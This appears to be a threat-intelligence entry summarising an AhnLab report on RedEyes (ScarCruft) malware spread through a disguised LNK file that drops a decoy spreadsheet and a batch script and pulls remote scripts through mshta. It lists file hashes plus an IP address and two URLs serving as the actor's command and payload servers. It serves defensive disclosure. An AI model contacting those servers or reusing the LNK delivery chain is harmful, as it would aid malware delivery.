lazarusholic

2023-09-06, Ahnlab
https://asec.ahnlab.com/en/56756/
#RedEyes #LNK #ScarCruft

AhnLab Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously distributed in CHM format, is now being distributed in LNK format. This malware executes additional scripts located at a specific URL through the mshta process. It then receives commands from the threat actor’s server to carry out additional malicious behaviors.
The threat actor has been distributing the confirmed LNK file on a regular website by uploading it alongside malware within a compressed file.
The malicious LNK file has been uploaded under the file name ‘REPORT.ZIP.’ Similar to the malware identified in <RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)> [2], this file has an LNK that contains normal Excel document data and malicious script code.
Therefore, when the ‘Status Survey Table.xlsx.lnk’ file is executed, it creates and executes a normal document called ‘Status Survey Table.xlsx’ and the malicious script ‘PMmVvG56FLC9y.bat’ in the %Temp% folder through PowerShell commands.
/c powershell …

0eb8db3cbde470407f942fd63afe42b8
27f74072d6268b5d96d73107c560d852
2d444b6f72c8327d1d155faa2cca7fd7
75.119.136.207
http://75.119.136.207/config/bases/config.php
http://bian0151.cafe24.com/admin/board/1.html